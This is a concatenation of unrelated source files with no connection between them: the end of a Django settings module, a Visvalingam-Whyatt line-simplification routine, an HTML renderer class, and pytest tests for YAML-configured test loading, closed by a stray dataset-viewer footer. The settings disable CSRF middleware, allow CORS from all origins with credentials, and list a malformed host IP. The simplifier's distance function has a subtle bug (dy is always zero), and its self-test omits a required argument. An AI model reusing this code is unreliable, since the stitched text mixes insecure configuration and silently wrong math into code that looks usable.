'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware'
]
ROOT_URLCONF = 'server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# 'DIRS': [os.path.join(BASE_DIR, 'templates')],
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
"""
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'templates', 'static')
]
"""
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
WSGI_APPLICATION = 'server.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = None
# 타입에 따라 다름
try:
if config["database"]["rdbms"]["type"] == "sqlite":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
elif config["database"]["rdbms"]["type"] == "mysql":
DATABASES = {
'default': {
'ENGINE': config["database"]["rdbms"]["engine"],
'NAME': config["database"]["rdbms"]["name"],
'USER': config["database"]["rdbms"]["user"],
'PASSWORD': config["database"]["rdbms"]["password"],
'HOST': config["database"]["rdbms"]["host"],
'PORT': str(config["database"]["rdbms"]["port"])
}
}
except Exception as e:
print(e)
print("config data has illeagal data")
print("please back to bin directory and run `perl install.pl install` again ")
exit(0)
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# CORS
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
ALLOWED_HOSTS = [
'localhost',
'1192.168.3.11',
'0.0.0.0',
'[::1]',
]
"""
ALLOWED_HOSTS = [
config['system']['host'],
"0.0.0.0",
"[::1]"
]
"""
CORS_ALLOW_HEADERS = [
'Set-Cookie'
]
REST_FRAMEWORK = {
# datetime format 지정
'DATETIME_FORMAT': "%Y-%m-%d %H:%M:%S.%f%z",
}
SYSTEM_CONFIG: SystemConfig = SystemConfig()
INTERNAL_DATABASE_MANAGER: InternalDatabaseConcurrencyManager = \
InternalDatabaseConcurrencyManager(SYSTEM_CONFIG)
|
<filename>tgap_ng/edge_simplify/visvalingham_whyatt.py
from .. import pqdict
from math import fabs
from operator import itemgetter
from simplegeom.geometry import LineString
from .ontriangle import on_triangle, orient2d
def area(p0, p1, p2):
"""Calculate the area of the triangle formed by three points"""
det = orient2d(p0, p1, p2)
area = fabs(0.5 * det)
return area
def dist(pa, pb):
dx = pb[0] - pa[0]
dy = pb[1] - pb[1]
return (dx ** 2 + dy ** 2) ** 0.5
def output_points(pts, fh):
for pt in pts:
fh.write("POINT({0[0]} {0[1]})\n".format(pt))
def simplify(line, pp, tolerance=float("inf"), DEBUG=False):
"""Simplifies a polyline with Visvalingham Whyatt algorithm,
i.e. bottom up
"""
# FIXME: Do we need an additional step to split a polyline
# in 2 pieces when it is a loop? Will lead to different simplification at
# least
#
prv = [None] * len(line)
nxt = [None] * len(line)
for i in range(len(line)):
prv[i] = i - 1
nxt[i] = i + 1
# first does not have prv and
# last does not have nxt
prv[0] = None
nxt[-1] = None
# measures for points
# first and last do not get any measure
oseq = pqdict.PQDict()
for i in range(1, len(line) - 1):
size = area(line[prv[i]], line[i], line[nxt[i]])
base = dist(line[prv[i]], line[nxt[i]])
if base == 0:
eps = float("inf")
else:
eps = size / (0.5 * base)
oseq[i] = eps
# FIXME:
# loops can also be formed by 2 edges,
# that can end up 'on top' of each other
is_loop = line[0] == line[-1]
remaining_ct = len(line)
measure = float("inf")
while oseq:
idx, measure, = oseq.popitem()
# print('try removing {}'.format(line[idx]))
if measure > tolerance:
break
if is_loop and remaining_ct <= 4:
# we need 4 points in a loop edge, no further simplification
# set measure to +inf, preventing from picking this edge again for
# simplification
measure = float("inf")
break
# FIXME: temporary stop criterion, always keep 3 points in any edge
# rationale: areas keep some size with 3 (non-collinear) points
# although no guarantees on collinearity, reduces chance
# on face collapsing into line (degeneracy)
if remaining_ct <= 3:
measure = float("inf")
break
# -- check if the triangle is empty
### print prv[idx], idx, nxt[idx]
start, mid, end = line[prv[idx]], line[idx], line[nxt[idx]]
if DEBUG: # True:
with open("/tmp/triangle_pts.wkt", "w") as fh:
fh.write("wkt\n")
output_points([start, mid, end], fh)
# rectangle that lies around this triangle
xmin = min(start[0], min(mid[0], end[0]))
xmax = max(start[0], max(mid[0], end[0]))
ymin = min(start[1], min(mid[1], end[1]))
ymax = max(start[1], max(mid[1], end[1]))
rect = [(xmin, ymin), (xmax, ymax)]
if DEBUG: # True:
with open("/tmp/rect.wkt", "w") as fh:
fh.write("wkt\n")
fh.write(
"""POLYGON(({xmin} {ymin}, {xmax} {ymin}, {xmax} {ymax}, {xmin} {ymax}, {xmin} {ymin}))\n""".format(
xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax
)
)
# by means of the quadtree we find overlapping points
# the number of overlapping points can already tell us something:
#
# if we find exactly 3, this triangle is empty, no need to check
# the points
# - however, it depends on the topological config with other edges
# whether it is safe to remove the vertex -> end points that form
# base of triangle, which also is an edge --> problematic to remove
# (area collapse of triangle) -- two edges form a loop
#
# if we find less than 3, there is a problem
# - either this is a degenerate line (with multiple vertices on same
# location) -> should be solved while reading the data
# - or there exists a problem/bug with the quadtree/keeping it up to date
# -> point not added in the tree, or the intersection method is
# not performing ok...
#
# if there is more than 3 points, we could potentially introduce
# intersection between segments, check if these points lie on interior
# of triangle that will be collapsed if we remove the point, if not
# then it is safe to remove the vertex from the polyline
# (postbox principle)
skip = False
overlapping_pts = pp.quadtree.range_search(rect)
# overlapping_pts = pp.kdtree.range_search(*rect)
if DEBUG: #
def do_debug():
with open("/tmp/overlapping.wkt", "w") as fh:
fh.write("wkt\n")
output_points(overlapping_pts, fh)
with open("/tmp/quadtree_pts.wkt", "w") as fh:
fh.write("wkt\n")
output_points([pt for pt in pp.quadtree], fh)
do_debug()
for pt in overlapping_pts:
if (
(pt[0] == start[0] and pt[1] == start[1])
or (pt[0] == mid[0] and pt[1] == mid[1])
or (pt[0] == end[0] and pt[1] == end[1])
):
continue
elif on_triangle(pt, start, mid, end):
skip = True
break
if DEBUG: #
print(f"skip := {skip} ")
input("debugging line")
if skip:
continue
# -- really remove vertex from the line
pp.quadtree.remove((mid[0], mid[1]))
remaining_ct -= 1
# make sure we only simplify interior points, and not end points
# get neighbouring points
prvidx = prv[idx]
nxtidx = nxt[idx]
indices = []
if prvidx != 0:
indices.append(prvidx)
if nxtidx != len(line) - 1:
indices.append(nxtidx)
#
# for idx in indices:
# oseq.pop(idx)
# link up previous and nxt vertex
nxt[prvidx] = nxtidx
prv[nxtidx] = prvidx
# update measures for those left and right
for i in indices:
assert 0 < i < len(line), "out of bounds: {0} {1}".format(i, len(line))
size = area(line[prv[i]], line[i], line[nxt[i]])
base = dist(line[prv[i]], line[nxt[i]])
if base == 0:
eps = float("inf")
else:
eps = size / (0.5 * base)
oseq[i] = eps
if DEBUG:
input("paused after simplify")
if remaining_ct == 2:
measure = float("inf")
simplified = []
simplified.append(line[0])
nxtidx = nxt[0]
assert nxtidx is not None
while nxtidx is not None:
simplified.append(line[nxtidx])
nxtidx = nxt[nxtidx]
return LineString(simplified, line.srid), measure
def _test():
simplify([(0, 0), (10, 0)])
print((simplify([(0, 0), (5, 5), (7, 0), (10, 0)], 2)))
if __name__ == "__main__":
_test()
|
<reponame>cariad/edition
from html.parser import HTMLParser
from io import StringIO
from logging import getLogger
from sys import stdout
from typing import IO, Callable, Dict, List, Optional, Tuple
from edition.html import get_css
from edition.metadata import Metadata
TAttribute = Tuple[str, Optional[str]]
class EditionHtmlRenderer(HTMLParser):
def __init__(
self,
metadata: Optional[Metadata] = None,
toc_writer: Optional[Callable[[IO[str], int, int], None]] = None,
) -> None:
super().__init__()
self._logger = getLogger("edition")
self._metadata = metadata
self._toc_writer = toc_writer
self._writer: IO[str] = stdout
self._last_data: str = ""
self._path: List[str] = []
def handle_comment(self, data: str) -> None:
"""
Handles HTML comments encountered in the feed.
"""
# We intentionally pass comments through since they could be present
# inside Markdown code blocks. We only escape the brackets to ensure the
# comments make it through subsequent HTML processing.
self._writer.write("<!--")
self._writer.write(data)
self._writer.write("-->")
def handle_data(self, data: str) -> None:
self._writer.write(data)
self._last_data = data
def handle_decl(self, decl: str) -> None:
self._writer.write(f"<!{decl}>")
def handle_endtag(self, tag: str) -> None:
self._path.pop()
self._writer.write(f"</{tag}>")
def _get_attrs(self, attrs: List[TAttribute]) -> Dict[str, str]:
wip: Dict[str, str] = {}
for a in attrs:
wip[str(a[0])] = str(a[1])
return wip
def _get_value(self, key: str, attributes: Dict[str, str]) -> str:
if not self._metadata:
return ""
if key == "favicon-href":
if emoji := self._get_value("favicon-emoji", attributes):
return f"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>{emoji}</text></svg>"
return ""
if key == "toc":
if not self._toc_writer:
raise Exception("no toc writer")
writer = StringIO()
hi = int(attributes.get("hi", 1))
lo = int(attributes.get("lo", 6))
self._toc_writer(writer, hi, lo)
return writer.getvalue().rstrip()
value = str(self._metadata.get(key, ""))
if not value:
self._logger.warning('No "%s" metadata.', key)
return value
def handle_startendtag(self, tag: str, attrs: List[TAttribute]) -> None:
edition_attrs = self._get_attrs(attrs)
attributes = self.make_attributes(attrs) if attrs else ""
inner = f"{tag} {attributes}".strip()
if tag == "edition":
if "pre" in self._path:
self._writer.write(f"<{inner} />")
else:
if "value" in edition_attrs:
value = self._get_value(edition_attrs["value"], edition_attrs)
element = edition_attrs.get("element", None)
if element:
self._writer.write("<")
self._writer.write(element)
self._writer.write(">")
self._writer.write(value)
self._writer.write("</")
self._writer.write(element)
self._writer.write(">")
else:
self._writer.write(value)
return
if if_key := edition_attrs.get("edition-if", None):
if_value = self._get_value(if_key, edition_attrs)
if not if_value:
# Don't write anything:
return
self._writer.write(f"<{inner} />")
def handle_starttag(self, tag: str, attrs: Optional[List[TAttribute]]) -> None:
self._path.insert(0, tag)
attributes = self.make_attributes(attrs) if attrs else ""
inner = f"{tag} {attributes}".strip()
self._writer.write(f"<{inner}>")
def make_attribute(
self,
attribute: TAttribute,
value_attributes: Dict[str, str],
) -> str:
if attribute[0].startswith("edition-"):
key_suffix = attribute[0][8:]
if key_suffix == "if":
return ""
metadata_key = str(attribute[1])
attribute = (
key_suffix,
str(self._get_value(metadata_key, value_attributes)),
)
return f'{attribute[0]}="{attribute[1]}"'
def make_attributes(self, attributes: List[TAttribute]) -> str:
value_attributes = self._get_attrs(attributes)
return " ".join([self.make_attribute(a, value_attributes) for a in attributes])
def _set_default_metadata(self) -> None:
if not self._metadata:
return None
with get_css() as f:
existing_css = str(self._metadata.get("css", ""))
new_css = f.read()
if new_css not in existing_css:
self._metadata["css"] = existing_css + "\n" + new_css
def render(self, reader: IO[str], writer: IO[str]) -> None:
self._set_default_metadata()
self._writer = writer
for line in reader:
self.feed(line)
self.close()
|
from tests.utils import YAML_EXTENSION
def test_skips_execution_without_arguments(pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestKeyValue
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(skipped=1)
class TestExecuteTests:
def test_based_on_arguments(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestKeyValue
test_data: [{"key": "abc","value":"abc"},
{"key": "cde", "value":"cde"}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(passed=2)
def test_multiple_times_separates_arguments(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestKeyValue
test_data: [{"key": "abc", "value":"abc"}]
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestKeyValue
test_data: [{"key": "abc", "value":"bcd"}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(passed=1, failed=1)
class TestOptionalAttributes:
def test_skips_test_if_attribute_is_missing(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestKeyValue
test_data: [{"key": "abc"}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(skipped=1)
def test_skips_test_if_non_optional_attribute_is_missing(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestOptionalAttribute
test_data: [{"key": "abc"}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(skipped=1)
def test_executes_test_if_optional_attribute_is_missing(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestOptionalAttribute
test_data: [{"value": null}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(passed=1)
def test_executes_test_if_any_optional_attribute_is_missing(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestOptionalAttributes
test_data: [{"value": null}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(passed=1)
def test_executes_test_if_all_optional_attribute_are_missing(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestOptionalAttributes
test_data: [{}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(passed=1)
def test_executes_test_if_required_attribute_is_none(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestKeyValue
test_data: [{"key": null, "value": null}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(passed=1)
def test_strips_spaced_attribute_names(self, pytester):
arguments = {
"test_class_loading": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestSpacedKeyValue
test_data: [{"key": null, "value": null}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(passed=1)
def test_single_arguments(self, pytester):
arguments = {
"test_single_argument": """
---
- test_module: tests.base_tests.simple_nuts_annotation
test_class: TestSingleValue
test_data: [{"value": "test"}]
"""
}
pytester.makefile(YAML_EXTENSION, **arguments)
result = pytester.runpytest()
result.assert_outcomes(passed=1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.